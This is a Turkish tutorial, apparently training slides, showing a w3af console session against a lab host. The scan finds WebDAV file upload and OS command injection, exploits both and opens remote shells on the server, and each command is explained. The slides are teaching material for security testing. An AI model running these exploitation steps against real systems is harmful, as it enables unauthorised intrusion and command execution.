Çalıştırma
  • 2. Dışardan aldığı parametreleri süzgeçten geçirmeden işletim sistemine aktaran bir web uygulamasına W3af ile yapılan test ve çıktıları: lifeoverip~#./w3af w3af>>> plugins w3af/plugins>>> output console,htmlFile w3af/plugins>>> output Enabled output plugins: console htmlFile w3af/plugins>>> output config htmlFile w3af/plugin/textFile>>> set fileName beyazsapka.html w3af/plugin/textFile>>> back w3af/plugins>>> output config console w3af/plugin/console>>> set verbosity 0 w3af/plugin/console>>> back w3af/plugins>>> audit dav, osCommanding,xss,xsrf w3af/plugins>>> discovery serverHeader,allowedMethods,pykto w3af/plugins>>> back w3af>>> target w3af/target>>> set target http://egitim-test/w3af/dav/, http://egitim-test/w3af/osCommanding/vulnerable.php?command=f0as9 w3af/target>>> back w3af>>> start Auto-enabling plugin: discovery.allowedMethods The Server header for this HTTP server is: Apache The URL: "http://egitim-test/w3af/dav/" has the following DAV methods enabled: - COPY, DELETE, GET, HEAD, LOCK, MOVE, OPTIONS, POST, PROPFIND, PROPPATCH, TRACE, UNLOCK Found 2 URLs and 2 different points of injection. The list of URLs is: - http://egitim-test/w3af/dav/ - http://egitim-test/w3af/osCommanding/vulnerable.php The list of fuzzable requests is: - http://egitim-test/w3af/dav/ | Method: GET - http://egitim-test/w3af/osCommanding/vulnerable.php | Method: GET | Parameters: (command) Starting dav plugin execution. 100% [====================================================] 2/2 Directory listing with HTTP PROPFIND method was found at directory: http://egitim-test/w3af/dav/ The vulnerability was found in the request with id 11. File upload with HTTP PUT method was found at directory: http://egitim-test/w3af/dav/ . Uploaded test file: http://egitim-test/w3af/dav/FReli The vulnerability was found in the request with id 9. Starting osCommanding plugin execution. 100% [====================================================] 2/2
  • 3. OS Commanding was found at: http://egitim-test/w3af/osCommanding/vulnerable.php . Using method: GET. The data sent was: command=+ping+-c+6+egitim-test The vulnerability was found in the request with id 15. w3af>>> exploit w3af/exploit>>> exploit * Using plugin: davShell davShell exploit plugin is starting. Vulnerability successfully exploited. Using plugin: osCommandingShell osCommandingShell exploit plugin is starting. Vulnerability successfully exploited. remoteFileIncludeShell plugin has to be correctly configured to use. w3af/exploit>>> interact This is a list of available shells: - [0] <davShell object (ruser: "nobody" | rsystem: "Linux bt 2.6.20-BT-PwnSauce-NOSMP i686 GNU/Linux")> - [1] <osCommandingShell object (ruser: "nobody" | rsystem: "Linux bt 2.6.20-BTPwnSauce-NOSMP i686 GNU/Linux")> w3af/exploit>>> interact 0 Execute "endInteraction" to get out of the remote shell. Commands typed in this menu will be runned on the remote web server. w3af/exploit/davShell-0>>> ls base/ beef/ beyazsapka.html dav/ manual/ phpnuke/ unicornscan/ w3af/ w3af/exploit/davShell-0>>> w 23:24:12 up 16:20, 3 users, load average: 0.00, 0.00, 0.00 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root tty1 07:05 15:03m 0.74s 0.01s /bin/sh /usr/X11R6/bin/startx root pts/8 192.168.2.2 22:24 59:28 0.02s 0.02s -bash root pts/9 192.168.2.2 23:16 0.00s 0.05s 0.01s w w3af/exploit/davShell-0>>> endInteraction Temel komutları adım adım incelersek karışık gibi görünen konsol kullanımının aslında bu işin temelinde yatan bazı terimlere ve konsepte bağlı olduğunu görürüz. output console,htmlFile : programın ürettiği çıktıların nasıl saklanacağını belirtir. Sonrasında verilen “output config htmlFile” komutu çıktıları kaydedeceğimiz html dosyasına ait özellikleri belirmek için kullanılır. Bir sonraki “set fileName beyazsapka.html” komutu ise çıktıların beyazsapka.html adlı dosyaya html formatında işleneceğini gösterir. audit dav, osCommanding,xss,xsrf : audit plugini hedef sistem üzerinde yapılacak ön denetimleri belirlemek için kullanılır. Yani sistemde varolan açıklıkların test edildiği ve varsa açıklık hangi dizin, url altında olduğunu bulmak için kullanıyoruz. Bizim örneğimizde dav, OsCommanding, xss ve xsrf zafiyetlerini sistem üzerinde test ettik.
  • 4. discovery serverHeader,allowedMethods,pykto : discovery plugini ile hedef seçilen sistem üzerinde keşif seviyesinde araştırmaları yapılır. Bu keşiflere örnek olarak sunucunun üzerinde çalıştığı platform tipi, web sunucu yazılımının izin verdiği http metodları, ya da web sayfası üzerinden direkt erişimi olmayıp da basit testler sonucu ulaşılabilecek dizin/dosyaları verebiliriz. set target http://egitim-test/w3af/dav/ : set target komutu testleri hangi sistem üzerinde gerçekleştireceğimizi belirtir. Burada yerine göre özel bir url ya da web sayfası verilebilir. start: audit ve discovery pluginlerini çalıştırmak için kullanılır. exploit * : Önceki aşamalarda bulunan ve exploit edilebilecek zafiyetleri değerlendirmek için kullanılır. Burada * diyerek tüm zafiyetleri değerlendirebiliriz ya da zafiyet numarası belirterek sadece ilgili açıklığı exploit etmesini sağlayabiliriz. nteract : başarı ile exploit edilmiş sistemlerde açılan shell numaralarını öğrenerek shell’ler aracılığı ile sisteme giriş yapmayı sağlayan komut. Parametresiz kullanıldığında This is a list of available shells: .. Şeklinde bir çıktı verecektir. Buradan istenilen shell numarası seçilerek sistemle shell üzerinden iletişim kurulabilir. >>> interact 0 gibi. Açılmış bir shell kapatılmak istenirse endInteraction komutu kullanılabilir. Görüleceği üzere komutlar ve parametreleri herhangi bir önbilgi ve ezber gerektirmiyor. Birkaç kere kullanıldıktan sonra aşina olunacak tipten. Yine de komut satırı parametreleri karışık geldiyse W3af’nin GUI sini kullanıp aynı işlemi birkaç tıklamayla halledebilirsiniz.
  • 5. W3af ile SQL Injection Dışardan aldığı değerleri süzgeçten geçirmeden veritabanına gönderen bir web uygulamasının W3af kullanılarak hacklenmesi